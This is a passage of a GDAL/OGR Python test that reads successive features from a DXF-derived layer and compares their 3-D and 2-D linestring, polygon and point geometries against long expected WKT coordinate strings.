feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-2.0 3.0 -3.46410161513775,-2.0 4.0 -3.46410161513775)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):25
# EntityHandle (String) = 1D5
# LINESTRING Z (-2.0 4.0 -3.46410161513775,-2.0 5.0 -3.46410161513775)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-2.0 4.0 -3.46410161513775,-2.0 5.0 -3.46410161513775)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):26
# EntityHandle (String) = 1D6
# LINESTRING Z (-1.0 4.0 -1.73205080756888,-1.00243594974018 4.06975647374412 -1.73626999628355,-1.00973193125843 4.13917310096007 -1.74890700696425,-1.02185239926619 4.20791169081776 -1.76990027336521,-1.03873830406168 4.275637355817 -1.79914751840276,-1.06030737921409 4.34202014332567 -1.83650625243901,-1.0864545423574 4.4067366430758 -1.88179446747701,-1.11705240714107 4.46947156278589 -1.93479152388545,-1.15195190384357 4.52991926423321 -1.99523922533277,-1.19098300562505 4.58778525229247 -2.06284307669368,-1.23395555688102 4.64278760968654 -2.13727371879988,-1.28066019966135 4.694658370459 -2.21816853304476,-1.33086939364114 4.74314482547739 -2.30513340802484,-1.38433852467434 4.78801075360672 -2.3977446596109,-1.44080709652925 4.82903757255504 -2.49555109509446,-1.5 4.86602540378444 -2.59807621135332,-1.56162885321092 4.89879404629917 -2.70482051632684,-1.62539340658409 4.92718385456679 -2.8152639624911,-1.69098300562505 4.95105651629515 -2.92886848047812,-1.75807810440033 4.970295726276 -3.04508060049576,-1.82635182233307 4.98480775301221 -3.16333414877688,-1.89547153673235 4.99452189536827 -3.28305300592108,-1.9651005032975 4.99939082701909 -3.40365391369044,-2.0348994967025 4.99939082701909 -3.52454931658507,-2.10452846326765 4.99452189536827 -3.64515022435443,-2.17364817766693 4.98480775301221 -3.76486908149863,-2.24192189559967 4.970295726276 -3.88312262977975,-2.30901699437495 4.95105651629515 -3.99933474979739,-2.37460659341591 4.92718385456679 -4.11293926778441,-2.43837114678908 4.89879404629917 -4.22338271394867,-2.5 4.86602540378444 -4.33012701892219,-2.55919290347075 4.82903757255504 -4.43265213518105,-2.61566147532566 4.78801075360672 -4.53045857066461,-2.66913060635886 4.74314482547739 -4.62306982225067,-2.71933980033865 4.694658370459 -4.71003469723075,-2.76604444311898 4.64278760968654 -4.79092951147563,-2.80901699437495 4.58778525229247 -4.86536015358183,-2.84804809615642 4.5299192642332 -4.93296400494274,-2.88294759285893 4.46947156278589 
-4.99341170639005,-2.9135454576426 4.4067366430758 -5.0464087627985,-2.93969262078591 4.34202014332567 -5.0916969778365,-2.96126169593832 4.275637355817 -5.12905571187275,-2.9781476007338 4.20791169081776 -5.1583029569103,-2.99026806874157 4.13917310096007 -5.17929622331126,-2.99756405025982 4.06975647374412 -5.19193323399196,-3.0 4.0 -5.19615242270663,-2.99756405025982 3.93024352625587 -5.19193323399196,-2.99026806874157 3.86082689903993 -5.17929622331126,-2.9781476007338 3.79208830918224 -5.1583029569103,-2.96126169593832 3.724362644183 -5.12905571187275,
#-2.93969262078591 3.65797985667433 -5.0916969778365,-2.9135454576426 3.5932633569242 -5.0464087627985,-2.88294759285893 3.53052843721411 -4.99341170639005,-2.84804809615642 3.4700807357668 -4.93296400494274,-2.80901699437495 3.41221474770753 -4.86536015358183,-2.76604444311898 3.35721239031346 -4.79092951147563,-2.71933980033865 3.305341629541 -4.71003469723075,-2.66913060635886 3.25685517452261 -4.62306982225067,-2.61566147532566 3.21198924639328 -4.53045857066461,-2.55919290347075 3.17096242744496 -4.43265213518105,-2.5 3.13397459621556 -4.33012701892219,-2.43837114678908 3.10120595370083 -4.22338271394867,-2.37460659341591 3.07281614543321 -4.11293926778441,-2.30901699437495 3.04894348370485 -3.99933474979739,-2.24192189559967 3.029704273724 -3.88312262977975,-2.17364817766693 3.01519224698779 -3.76486908149863,-2.10452846326765 3.00547810463173 -3.64515022435443,-2.0348994967025 3.0006091729809 -3.52454931658507,-1.9651005032975 3.0006091729809 -3.40365391369044,-1.89547153673235 3.00547810463173 -3.28305300592108,-1.82635182233307 3.01519224698779 -3.16333414877688,-1.75807810440033 3.029704273724 -3.04508060049576,-1.69098300562505 3.04894348370485 -2.92886848047812,-1.62539340658409 3.07281614543321 -2.8152639624911,-1.56162885321092 3.10120595370083 -2.70482051632684,-1.5 3.13397459621556 -2.59807621135332,-1.44080709652925 3.17096242744496 -2.49555109509446,-1.38433852467434 3.21198924639328 -2.3977446596109,-1.33086939364114 3.25685517452261 -2.30513340802484,-1.28066019966135 3.305341629541 -2.21816853304476,-1.23395555688102 3.35721239031346 -2.13727371879988,-1.19098300562505 3.41221474770753 -2.06284307669368,-1.15195190384357 3.4700807357668 -1.99523922533277,-1.11705240714107 3.53052843721411 -1.93479152388545,-1.0864545423574 3.5932633569242 -1.88179446747701,-1.06030737921409 3.65797985667433 -1.83650625243901,-1.03873830406168 3.724362644183 -1.79914751840276,-1.02185239926619 3.79208830918224 -1.76990027336521,-1.00973193125843 3.86082689903993 
-1.74890700696425,-1.00243594974018 3.93024352625587 -1.73626999628355,-1.0 4.0 -1.73205080756888)
# Read the next feature and verify its geometry matches the expected
# tessellated LINESTRING Z vertex-for-vertex; on mismatch, dump the
# feature for debugging and fail the test.
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-1.0 4.0 -1.73205080756888,-1.00243594974018 4.06975647374412 -1.73626999628355,-1.00973193125843 4.13917310096007 -1.74890700696425,-1.02185239926619 4.20791169081776 -1.76990027336521,-1.03873830406168 4.275637355817 -1.79914751840276,-1.06030737921409 4.34202014332567 -1.83650625243901,-1.0864545423574 4.4067366430758 -1.88179446747701,-1.11705240714107 4.46947156278589 -1.93479152388545,-1.15195190384357 4.52991926423321 -1.99523922533277,-1.19098300562505 4.58778525229247 -2.06284307669368,-1.23395555688102 4.64278760968654 -2.13727371879988,-1.28066019966135 4.694658370459 -2.21816853304476,-1.33086939364114 4.74314482547739 -2.30513340802484,-1.38433852467434 4.78801075360672 -2.3977446596109,-1.44080709652925 4.82903757255504 -2.49555109509446,-1.5 4.86602540378444 -2.59807621135332,-1.56162885321092 4.89879404629917 -2.70482051632684,-1.62539340658409 4.92718385456679 -2.8152639624911,-1.69098300562505 4.95105651629515 -2.92886848047812,-1.75807810440033 4.970295726276 -3.04508060049576,-1.82635182233307 4.98480775301221 -3.16333414877688,-1.89547153673235 4.99452189536827 -3.28305300592108,-1.9651005032975 4.99939082701909 -3.40365391369044,-2.0348994967025 4.99939082701909 -3.52454931658507,-2.10452846326765 4.99452189536827 -3.64515022435443,-2.17364817766693 4.98480775301221 -3.76486908149863,-2.24192189559967 4.970295726276 -3.88312262977975,-2.30901699437495 4.95105651629515 -3.99933474979739,-2.37460659341591 4.92718385456679 -4.11293926778441,-2.43837114678908 4.89879404629917 -4.22338271394867,-2.5 4.86602540378444 -4.33012701892219,-2.55919290347075 4.82903757255504 -4.43265213518105,-2.61566147532566 4.78801075360672 -4.53045857066461,-2.66913060635886 4.74314482547739 -4.62306982225067,-2.71933980033865 4.694658370459 -4.71003469723075,-2.76604444311898 4.64278760968654 -4.79092951147563,-2.80901699437495 4.58778525229247 -4.86536015358183,-2.84804809615642 4.5299192642332 
-4.93296400494274,-2.88294759285893 4.46947156278589 -4.99341170639005,-2.9135454576426 4.4067366430758 -5.0464087627985,-2.93969262078591 4.34202014332567 -5.0916969778365,-2.96126169593832 4.275637355817 -5.12905571187275,-2.9781476007338 4.20791169081776 -5.1583029569103,-2.99026806874157 4.13917310096007 -5.17929622331126,-2.99756405025982 4.06975647374412 -5.19193323399196,-3.0 4.0 -5.19615242270663,-2.99756405025982 3.93024352625587 -5.19193323399196,-2.99026806874157 3.86082689903993 -5.17929622331126,-2.9781476007338 3.79208830918224 -5.1583029569103,-2.96126169593832 3.724362644183 -5.12905571187275,' + \
'-2.93969262078591 3.65797985667433 -5.0916969778365,-2.9135454576426 3.5932633569242 -5.0464087627985,-2.88294759285893 3.53052843721411 -4.99341170639005,-2.84804809615642 3.4700807357668 -4.93296400494274,-2.80901699437495 3.41221474770753 -4.86536015358183,-2.76604444311898 3.35721239031346 -4.79092951147563,-2.71933980033865 3.305341629541 -4.71003469723075,-2.66913060635886 3.25685517452261 -4.62306982225067,-2.61566147532566 3.21198924639328 -4.53045857066461,-2.55919290347075 3.17096242744496 -4.43265213518105,-2.5 3.13397459621556 -4.33012701892219,-2.43837114678908 3.10120595370083 -4.22338271394867,-2.37460659341591 3.07281614543321 -4.11293926778441,-2.30901699437495 3.04894348370485 -3.99933474979739,-2.24192189559967 3.029704273724 -3.88312262977975,-2.17364817766693 3.01519224698779 -3.76486908149863,-2.10452846326765 3.00547810463173 -3.64515022435443,-2.0348994967025 3.0006091729809 -3.52454931658507,-1.9651005032975 3.0006091729809 -3.40365391369044,-1.89547153673235 3.00547810463173 -3.28305300592108,-1.82635182233307 3.01519224698779 -3.16333414877688,-1.75807810440033 3.029704273724 -3.04508060049576,-1.69098300562505 3.04894348370485 -2.92886848047812,-1.62539340658409 3.07281614543321 -2.8152639624911,-1.56162885321092 3.10120595370083 -2.70482051632684,-1.5 3.13397459621556 -2.59807621135332,-1.44080709652925 3.17096242744496 -2.49555109509446,-1.38433852467434 3.21198924639328 -2.3977446596109,-1.33086939364114 3.25685517452261 -2.30513340802484,-1.28066019966135 3.305341629541 -2.21816853304476,-1.23395555688102 3.35721239031346 -2.13727371879988,-1.19098300562505 3.41221474770753 -2.06284307669368,-1.15195190384357 3.4700807357668 -1.99523922533277,-1.11705240714107 3.53052843721411 -1.93479152388545,-1.0864545423574 3.5932633569242 -1.88179446747701,-1.06030737921409 3.65797985667433 -1.83650625243901,-1.03873830406168 3.724362644183 -1.79914751840276,-1.02185239926619 3.79208830918224 -1.76990027336521,-1.00973193125843 3.86082689903993 
-1.74890700696425,-1.00243594974018 3.93024352625587 -1.73626999628355,-1.0 4.0 -1.73205080756888)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):27
# EntityHandle (String) = 1D7
# LINESTRING Z (-1.0 2.0 -1.73205080756888,-0.983288972510522 2.03582232791524 -1.70310645891042,-0.967858303543227 2.07387296203834 -1.67637975626429,-0.953782068732337 2.11396923855472 -1.65199900239256,-0.941127841688774 2.15591867344963 -1.6300812382226,-0.929956369609942 2.19951988653655 -1.61073168098672,-0.92032128166002 2.24456356819194 -1.59404321912206,-0.912268831520699 2.29083348415575 -1.58009596635534,-0.905837675348257 2.33810751357387 -1.56895687711326,-0.901058686202915 2.38615871529951 -1.56067942510471,-0.89795480584129 2.43475641733454 -1.55530334661776,-0.896540934583439 2.48366732418105 -1.5528544497638,-0.896823859783196 2.53265663678705 -1.55334449058452,-0.898802223245158 2.58148917971011 -1.55677111661648,-0.902466527744776 2.62993053008786 -1.56311787818422,-0.907799182620207 2.67774814299567 -1.5723543073677,-0.9147745882171 2.72471246778926 -1.58443606426492,-0.923359258780906 2.7705980500731 -1.59930514984767,-0.933511983206783 2.81518461400453 -1.61689018438853,-0.945184022875394 2.85825811973811 -1.63710675012253,-0.958319345624882 2.89961179093367 -1.65985779649846,-0.972854894735838 2.93904710739563 -1.68503410607454,-0.988720891637972 2.97637475807832 -1.71251481882177,-1.00584117088534 3.01141554988232 -1.74216801231798,-1.02413354579207 3.04400126787917 -1.77385133504753,-1.04351020297329 3.07397548283483 -1.80741268976625,-1.06387812389736 3.10119430215541 -1.84269096365129,-1.08513953142555 3.12552706065018 -1.87951680173053,-1.1071923591957 3.14685694779575 -1.917713419879,-1.12993074159648 3.16508156849045 -1.95709745347909,-1.15324552198012 3.18011343460661 -1.99747983767086,-1.17702477667387 3.1918803849814 -2.03866671496655,-1.20115435227475 3.20032593182975 -2.08046036587236,-1.22551841364822 3.2054095319166 -2.12266015804993,-1.25 3.20710678118655 -2.1650635094611,-1.27448158635178 3.2054095319166 -2.20746686087227,-1.29884564772525 3.20032593182975 -2.24966665304983,-1.32297522332613 3.1918803849814 
-2.29146030395564,-1.34675447801988 3.18011343460661 -2.33264718125133,-1.37006925840352 3.16508156849045 -2.3730295654431,-1.3928076408043 3.14685694779575 -2.41241359904319,-1.41486046857445 3.12552706065018 -2.45061021719166,-1.43612187610264 3.10119430215541 -2.48743605527091,-1.45648979702671 3.07397548283483 -2.52271432915594,-1.47586645420793 3.04400126787917 -2.55627568387467,-1.49415882911466 3.01141554988232 -2.58795900660421,-1.51127910836203 2.97637475807832 -2.61761220010042,-1.52714510526416 2.93904710739563 -2.64509291284765,-1.54168065437512 2.89961179093367 -2.67026922242374,-1.55481597712461 2.85825811973811 -2.69302026879967,-1.56648801679322 2.81518461400453 -2.71323683453366,-1.57664074121909 2.7705980500731 -2.73082186907453,-1.5852254117829 2.72471246778926 -2.74569095465728,-1.59220081737979 2.67774814299567 -2.7577727115545,-1.59753347225522 2.62993053008785 -2.76700914073797,-1.60119777675484 2.58148917971011 -2.77335590230571,-1.6031761402168 2.53265663678705 -2.77678252833767,-1.60345906541656 2.48366732418105 -2.77727256915839,-1.60204519415871 2.43475641733454 -2.77482367230443,-1.59894131379708 2.38615871529951 -2.76944759381748,-1.59416232465174 2.33810751357387 -2.76117014180893,-1.5877311684793 2.29083348415575 -2.75003105256685,-1.57967871833998 2.24456356819194 -2.73608379980013,-1.57004363039006 2.19951988653655 -2.71939533793547,-1.55887215831123 2.15591867344963 -2.7000457806996,-1.54621793126766 2.11396923855472 -2.67812801652963,-1.53214169645677 2.07387296203834 -2.6537472626579,-1.51671102748948 2.03582232791524 -2.62702056001177,-1.5 2.0 -2.59807621135332)
# Read the next feature and verify its geometry matches the expected
# tessellated LINESTRING Z vertex-for-vertex; on mismatch, dump the
# feature for debugging and fail the test.
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (-1.0 2.0 -1.73205080756888,-0.983288972510522 2.03582232791524 -1.70310645891042,-0.967858303543227 2.07387296203834 -1.67637975626429,-0.953782068732337 2.11396923855472 -1.65199900239256,-0.941127841688774 2.15591867344963 -1.6300812382226,-0.929956369609942 2.19951988653655 -1.61073168098672,-0.92032128166002 2.24456356819194 -1.59404321912206,-0.912268831520699 2.29083348415575 -1.58009596635534,-0.905837675348257 2.33810751357387 -1.56895687711326,-0.901058686202915 2.38615871529951 -1.56067942510471,-0.89795480584129 2.43475641733454 -1.55530334661776,-0.896540934583439 2.48366732418105 -1.5528544497638,-0.896823859783196 2.53265663678705 -1.55334449058452,-0.898802223245158 2.58148917971011 -1.55677111661648,-0.902466527744776 2.62993053008786 -1.56311787818422,-0.907799182620207 2.67774814299567 -1.5723543073677,-0.9147745882171 2.72471246778926 -1.58443606426492,-0.923359258780906 2.7705980500731 -1.59930514984767,-0.933511983206783 2.81518461400453 -1.61689018438853,-0.945184022875394 2.85825811973811 -1.63710675012253,-0.958319345624882 2.89961179093367 -1.65985779649846,-0.972854894735838 2.93904710739563 -1.68503410607454,-0.988720891637972 2.97637475807832 -1.71251481882177,-1.00584117088534 3.01141554988232 -1.74216801231798,-1.02413354579207 3.04400126787917 -1.77385133504753,-1.04351020297329 3.07397548283483 -1.80741268976625,-1.06387812389736 3.10119430215541 -1.84269096365129,-1.08513953142555 3.12552706065018 -1.87951680173053,-1.1071923591957 3.14685694779575 -1.917713419879,-1.12993074159648 3.16508156849045 -1.95709745347909,-1.15324552198012 3.18011343460661 -1.99747983767086,-1.17702477667387 3.1918803849814 -2.03866671496655,-1.20115435227475 3.20032593182975 -2.08046036587236,-1.22551841364822 3.2054095319166 -2.12266015804993,-1.25 3.20710678118655 -2.1650635094611,-1.27448158635178 3.2054095319166 -2.20746686087227,-1.29884564772525 3.20032593182975 
-2.24966665304983,-1.32297522332613 3.1918803849814 -2.29146030395564,-1.34675447801988 3.18011343460661 -2.33264718125133,-1.37006925840352 3.16508156849045 -2.3730295654431,-1.3928076408043 3.14685694779575 -2.41241359904319,-1.41486046857445 3.12552706065018 -2.45061021719166,-1.43612187610264 3.10119430215541 -2.48743605527091,-1.45648979702671 3.07397548283483 -2.52271432915594,-1.47586645420793 3.04400126787917 -2.55627568387467,-1.49415882911466 3.01141554988232 -2.58795900660421,-1.51127910836203 2.97637475807832 -2.61761220010042,-1.52714510526416 2.93904710739563 -2.64509291284765,-1.54168065437512 2.89961179093367 -2.67026922242374,-1.55481597712461 2.85825811973811 -2.69302026879967,-1.56648801679322 2.81518461400453 -2.71323683453366,-1.57664074121909 2.7705980500731 -2.73082186907453,-1.5852254117829 2.72471246778926 -2.74569095465728,-1.59220081737979 2.67774814299567 -2.7577727115545,-1.59753347225522 2.62993053008785 -2.76700914073797,-1.60119777675484 2.58148917971011 -2.77335590230571,-1.6031761402168 2.53265663678705 -2.77678252833767,-1.60345906541656 2.48366732418105 -2.77727256915839,-1.60204519415871 2.43475641733454 -2.77482367230443,-1.59894131379708 2.38615871529951 -2.76944759381748,-1.59416232465174 2.33810751357387 -2.76117014180893,-1.5877311684793 2.29083348415575 -2.75003105256685,-1.57967871833998 2.24456356819194 -2.73608379980013,-1.57004363039006 2.19951988653655 -2.71939533793547,-1.55887215831123 2.15591867344963 -2.7000457806996,-1.54621793126766 2.11396923855472 -2.67812801652963,-1.53214169645677 2.07387296203834 -2.6537472626579,-1.51671102748948 2.03582232791524 -2.62702056001177,-1.5 2.0 -2.59807621135332)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):28
# EntityHandle (String) = 1D8
# POLYGON Z ((-0.5 2.0 -0.866025403784439,-0.5 3.0 -0.866025403784439,-1.0 3.0 -1.73205080756888,-1.0 2.0 -1.73205080756888,-0.5 2.0 -0.866025403784439))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((-0.5 2.0 -0.866025403784439,-0.5 3.0 -0.866025403784439,-1.0 3.0 -1.73205080756888,-1.0 2.0 -1.73205080756888,-0.5 2.0 -0.866025403784439))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):29
# EntityHandle (String) = 1D9
# POLYGON Z ((-1.5 4.0 -2.59807621135332,-2.0 4.0 -3.46410161513776,-2.0 3.0 -3.46410161513776,-1.5 3.0 -2.59807621135332,-1.5 4.0 -2.59807621135332))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON ((-1.5 4.0 -2.59807621135332,-2.0 4.0 -3.46410161513776,-2.0 3.0 -3.46410161513776,-1.5 3.0 -2.59807621135332,-1.5 4.0 -2.59807621135332))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):30
# EntityHandle (String) = 1DB
# POLYGON Z ((-4.0 8.0 -6.92820323027551,-4.5 8.0 -7.79422863405995,-4.5 9.0 -7.79422863405995,-4.0 9.0 -6.92820323027551,-4.0 8.0 -6.92820323027551))
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POLYGON Z ((-4.0 8.0 -6.92820323027551,-4.5 8.0 -7.79422863405995,-4.5 9.0 -7.79422863405995,-4.0 9.0 -6.92820323027551,-4.0 8.0 -6.92820323027551))'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):31
# EntityHandle (String) = 1DC
# LINESTRING (-1.0 2.0,-1.07692307692308 2.15384615384615,-1.15384615384615 2.30769230769231,-1.23076923076923 2.46153846153846,-1.30769230769231 2.61538461538461,-1.38461538461538 2.76923076923077,-1.46153846153846 2.92307692307692,-1.53846153846154 3.07692307692308,-1.61538461538461 3.23076923076923,-1.69230769230769 3.38461538461538,-1.76923076923077 3.53846153846154,-1.84615384615384 3.69230769230769,-1.92307692307692 3.84615384615385,-2.0 4.0,-2.07692307692307 4.15384615384615,-2.15384615384615 4.30769230769231,-2.23076923076923 4.46153846153846,-2.30769230769231 4.61538461538462,-2.38461538461538 4.76923076923077,-2.46153846153846 4.92307692307692,-2.53846153846154 5.07692307692308,-2.61538461538461 5.23076923076923,-2.69230769230769 5.38461538461538,-2.76923076923077 5.53846153846154,-2.84615384615384 5.69230769230769,-2.92307692307692 5.84615384615385,-3.0 6.0,-3.07692307692308 6.15384615384615,-3.15384615384615 6.30769230769231,-3.23076923076923 6.46153846153846,-3.30769230769231 6.61538461538462,-3.38461538461538 6.76923076923077,-3.46153846153846 6.92307692307692,-3.53846153846154 7.07692307692308,-3.61538461538461 7.23076923076923,-3.69230769230769 7.38461538461539,-3.76923076923077 7.53846153846154,-3.84615384615384 7.69230769230769,-3.92307692307692 7.84615384615385,-4.0 8.0)
# Read the next feature and verify its 2-D tessellated LINESTRING matches
# the expected vertices; on mismatch, dump the feature and fail the test.
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (-1.0 2.0,-1.07692307692308 2.15384615384615,-1.15384615384615 2.30769230769231,-1.23076923076923 2.46153846153846,-1.30769230769231 2.61538461538461,-1.38461538461538 2.76923076923077,-1.46153846153846 2.92307692307692,-1.53846153846154 3.07692307692308,-1.61538461538461 3.23076923076923,-1.69230769230769 3.38461538461538,-1.76923076923077 3.53846153846154,-1.84615384615384 3.69230769230769,-1.92307692307692 3.84615384615385,-2.0 4.0,-2.07692307692307 4.15384615384615,-2.15384615384615 4.30769230769231,-2.23076923076923 4.46153846153846,-2.30769230769231 4.61538461538462,-2.38461538461538 4.76923076923077,-2.46153846153846 4.92307692307692,-2.53846153846154 5.07692307692308,-2.61538461538461 5.23076923076923,-2.69230769230769 5.38461538461538,-2.76923076923077 5.53846153846154,-2.84615384615384 5.69230769230769,-2.92307692307692 5.84615384615385,-3.0 6.0,-3.07692307692308 6.15384615384615,-3.15384615384615 6.30769230769231,-3.23076923076923 6.46153846153846,-3.30769230769231 6.61538461538462,-3.38461538461538 6.76923076923077,-3.46153846153846 6.92307692307692,-3.53846153846154 7.07692307692308,-3.61538461538461 7.23076923076923,-3.69230769230769 7.38461538461539,-3.76923076923077 7.53846153846154,-3.84615384615384 7.69230769230769,-3.92307692307692 7.84615384615385,-4.0 8.0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):32
# EntityHandle (String) = 1DD
# LINESTRING (-4.0 1.0,-3.81418685412768 0.987348067229724,-3.62887944840607 0.975707614760869,-3.44458352298589 0.966090122894857,-3.26180481801783 0.959507071933107,-3.08104907365262 0.956969942177043,-2.90282203004096 0.959490213928084,-2.72762942733357 0.968079367487651,-2.55597700568115 0.983748883157167,-2.38837050523441 1.00751024123805,-2.22531566614407 1.04037492203173,-2.06731822856083 1.08335440583961,-1.91488393263541 1.13746017296313,-1.76851851851852 1.2037037037037,-1.62872772636086 1.28309647836275,-1.49601729631315 1.37664997724169,-1.3708929685261 1.48537568064195,-1.25386048315042 1.61028506886495,-1.14542558033682 1.75238962221211,-1.04609400023601 1.91270082098484,-0.956350410492422 2.09218800047202,-0.876194811106054 2.29085116067364,-0.805142534432475 2.50772096630085,-0.742687840320977 2.74178593705221,-0.688324988620847 2.99203459262631,-0.641548239181376 3.25745545272172,-0.601851851851852 3.53703703703703,-0.568730086481566 3.82976786527082,-0.541677202919806 4.13463645712166,-0.520187461015863 4.45063133228814,-0.503755120619026 4.77674101046882,-0.491874441578583 5.11195401136229,-0.484039683743826 5.45525885466714,-0.479745106964042 5.80564406008193,-0.478484971088521 6.16209814730525,-0.479753535966554 6.52360963603567,-0.483045061447428 6.88916704597178,-0.487853807380435 7.25775889681216,-0.493674033614862 7.62837370825537,-0.5 8.0)
# Read the next feature and verify its 2-D tessellated LINESTRING matches
# the expected vertices; on mismatch, dump the feature and fail the test.
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING (-4.0 1.0,-3.81418685412768 0.987348067229724,-3.62887944840607 0.975707614760869,-3.44458352298589 0.966090122894857,-3.26180481801783 0.959507071933107,-3.08104907365262 0.956969942177043,-2.90282203004096 0.959490213928084,-2.72762942733357 0.968079367487651,-2.55597700568115 0.983748883157167,-2.38837050523441 1.00751024123805,-2.22531566614407 1.04037492203173,-2.06731822856083 1.08335440583961,-1.91488393263541 1.13746017296313,-1.76851851851852 1.2037037037037,-1.62872772636086 1.28309647836275,-1.49601729631315 1.37664997724169,-1.3708929685261 1.48537568064195,-1.25386048315042 1.61028506886495,-1.14542558033682 1.75238962221211,-1.04609400023601 1.91270082098484,-0.956350410492422 2.09218800047202,-0.876194811106054 2.29085116067364,-0.805142534432475 2.50772096630085,-0.742687840320977 2.74178593705221,-0.688324988620847 2.99203459262631,-0.641548239181376 3.25745545272172,-0.601851851851852 3.53703703703703,-0.568730086481566 3.82976786527082,-0.541677202919806 4.13463645712166,-0.520187461015863 4.45063133228814,-0.503755120619026 4.77674101046882,-0.491874441578583 5.11195401136229,-0.484039683743826 5.45525885466714,-0.479745106964042 5.80564406008193,-0.478484971088521 6.16209814730525,-0.479753535966554 6.52360963603567,-0.483045061447428 6.88916704597178,-0.487853807380435 7.25775889681216,-0.493674033614862 7.62837370825537,-0.5 8.0)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):33
# EntityHandle (String) = 1DE
# POINT Z (-3.5 7.0 -6.06217782649107)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (-3.5 7.0 -6.06217782649107)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):34
# EntityHandle (String) = 1DF
# POINT Z (1.0 -2.0 -5.19615242270663)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'POINT Z (1.0 -2.0 -5.19615242270663)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):35
# EntityHandle (String) = 1E0
# LINESTRING Z (0 0 0,0.25 -0.5 -1.29903810567666)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0 0 0,0.25 -0.5 -1.29903810567666)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):36
# EntityHandle (String) = 1E1
# LINESTRING Z (0.25 -0.5 -1.29903810567666,-0.25 -0.5 -2.1650635094611,1.0 -1.0 -1.73205080756888,0.25 -0.5 -1.29903810567666)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0.25 -0.5 -1.29903810567666,-0.25 -0.5 -2.1650635094611,1.0 -1.0 -1.73205080756888,0.25 -0.5 -1.29903810567666)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):37
# EntityHandle (String) = 1E2
# LINESTRING Z (0.25 -0.5 -1.29903810567666,1 -1 -1.73205080756888,0.5 -1.0 -2.59807621135332,0.25 -0.5 -1.29903810567666)
feat = lyr.GetNextFeature()
if ogrtest.check_feature_geometry( feat, 'LINESTRING Z (0.25 -0.5 -1.29903810567666,1 -1 -1.73205080756888,0.5 -1.0 -2.59807621135332,0.25 -0.5 -1.29903810567666)'):
feat.DumpReadable()
return 'fail'
# OGRFeature(entities):38
# EntityHandle (String) = 1E7
# LINESTRING Z (2.78885438199983 -2.89442719099992 -5.19615242270663,2.76889880091653 -2.9234444547489 -5.33123525325721,2.74032532268425 -2.94796278993866 -5.46565997383582,2.70327315441675 -2.96786274570473 -5.59877168071614,2.65792281055334 -2.98304737146295 -5.72992186704258,2.60449523341074 -2.99344268924297 -5.85847158229053,2.54325071677425 -2.99899805410152 -5.98379454516908,2.47448763777266 -2.99968640085941 -6.1052801948005,2.39854100321483 -2.99550437596044 -6.22233666531148,2.31578081747018 -2.98647235380955 -6.33439366934417,2.22661027984464 -2.97263433751074 -6.44090527643885,2.13146382023413 -2.95405774448845 -6.54135257275227,2.03080498262578 -2.93083307803656 -6.63524618915372,1.92512416675824 -2.90307348639549 -6.72212868538223,1.81493623894341 -2.87091421150532 -6.80157677864958,1.70077802368955 -2.8345119301207 -6.87320340583148,1.58320568834623 -2.79404399049737 -6.93665960920016,1.46279203351292 -2.74970754836936 -6.99163623651142,1.34012370241203 -2.70171860642604 -7.03786544716322,1.21579832282211 -2.65031096196872 -7.07512201708822,1.09042159549536 -2.59573506787371 -7.10322443602275,0.964604343244512 -2.5382568124111 -7.12203579180661,0.838959535075416 -2.47815622386382 -7.13146443740534,0.714099299863701 -2.41572610625796 -7.13146443740534,0.590631944124412 -2.35127061285105 -7.12203579180661,0.469158988403815 -2.28510376432794 -7.10322443602275,0.350272236731764 -2.21754791892355 -7.07512201708822,0.234550893411949 -2.148932201926 -7.03786544716322,0.122558741196756 -2.07959090221128 -6.99163623651142,0.014841394594365 -2.00986184362144 -6.93665960920016,-0.088076358310285 -1.94008473912078 -6.87320340583148,-0.185693112570302 -1.87059953574847 -6.80157677864958,-0.277533289171331 -1.8017447584307 -6.72212868538223,-0.363149452004714 -1.73385586072131 -6.63524618915372,-0.442124487731234 -1.66726359050577 -6.54135257275227,-0.514073637915374 -1.60229237863074 -6.44090527643885,-0.57864637352974 -1.53925875830959 
-6.33439366934417,-0.635528102697248 -1.47846982300441 -6.22233666531148,-0.684441703351125 -1.42022173029752 -6.1052801948005,-0.725148873345763 -1.36479825904151 -5.98379454516908,-0.757451291440819 -1.31246942681719 -5.85847158229053,-0.781191583502361 -1.2634901744351 -5.72992186704258,-0.796254089213832 -1.21809912388944 -5.59877168071614,-0.802565425561482 -1.1765174158158 -5.46565997383582,-0.80009484434904 -1.13894763211612 -5.33123525325721,-0.788854381999831 -1.10557280900008 -5.19615242270663,-0.768898800916532 -1.0765555452511 -5.06106959215606,-0.740325322684253 -1.05203721006134 -4.92664487157745,-0.703273154416746 -1.03213725429527 -4.79353316469713,
